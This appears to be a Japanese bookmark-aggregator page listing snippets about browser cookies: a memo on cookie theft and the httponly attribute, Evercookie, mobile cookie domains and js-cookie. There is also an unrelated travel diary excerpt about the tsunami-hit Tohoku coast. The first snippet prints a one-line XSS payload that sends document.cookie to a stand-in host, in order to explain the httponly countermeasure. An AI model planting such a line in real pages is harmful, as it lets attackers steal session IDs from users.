Cookieを盗む例とhttponly属性 at softelメモ
以下は、とても単純なJavascriptによる例。 document.write('<img src="http://example.com/?x=' +escape(document.cookie) + '">'); example.com に対してGET渡しでdocument.cookieが送信される。 取得されたcookieにセッションIDが含まれるとセッションIDが他人に知られるところとなる。 リンクを踏ませるなどの方法でHTML中に上のようなスクリプトを仕込むことができると、攻撃が成立する。 対策例 document.cookieで取得できてしまうから危険なのでは? → 発行するcookieにhttponly属性を付与して、document.cookieで取得できなくしよう WordPressでも以下のような書き方をしていた。PHP5.2.0で追加された第7引数でhttponly
Evercookie - Wikipedia
This article's factual accuracy may be compromised due to out-of-date information. The reason given is: methods used by Evercookie weren't working in modern browsers since 2016-2018. Relevant discussion may be found on the talk page. Please help update this article to reflect recent events or newly available information. (October 2022) 'Tor Stinks' NSA presentation Evercookie (also known as superc
よくわからないクッキーの話 - どさにっき
2011年10月11日(火) ■ 無題 _ 有休取って今日もお休み。 _ 北山崎。崖が険しすぎるので、このへんはなんともない。 鵜の巣断崖。よく見ると奥の方に復旧工事をやってるクレーンが写ってる。 浄土ヶ浜。さすがに海面に近いと傷跡を見せつけられる。 _ ということで、帰路は北東北の太平洋沿岸部を走る国道45号をひたすら南下。震災後に東北方面には何度も(遊びに)行ってるけど、内陸ばっかりで海の方はあえて避けていた。半年たって、そろそろいいかな、と。ただの野次馬だろと言われればまさにその通りで返す言葉はないんだけど、これまで何度も来たところがどんなふうに変わってしまったのか、今のうちにどうしても見ておきたかった。 _ もちろん報道で知ってはいたけど、実際目にすると、ひどい。津波にやられたところが更地になってるのであればまだよかった。コンクリートの基礎だけはしっかりと残ってるから、そこに生活の
ウノウラボ Unoh Labs: 携帯とCookieドメイン
こんばんわ五十川です。 しばらく前になりますが、ソーシャルスクラップブックclippのモバイル版をリリースしました。cippモバイルではドコモ以外は、セッション管理にCookie(のみ)を利用することにしたのですが、そのときCookieドメインではまりました、というお話。 PC向けclippのドメイン名は、トップページなどのユーザ共通ページは「clipp.in」、ユーザ個別のページは「{username}.clipp.in」(例えばclipp-info.clipp.in)となっています。ケータイサイトをマルチなサブドメインにする例はあまり多くないと思いますが、clippモバイルでは、ルーティング直すのめんどくさいという怠け者な理由で、PC版のドメイン名がそのまま使えればいいなと思って取り掛かりました。しかし、その目論見はあっさりと破綻することになるのでした。 以下の内容は手元の数多くない端
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
GitHub - js-cookie/js-cookie: A simple, lightweight JavaScript API for handling browser cookies
Yahoo! Groups
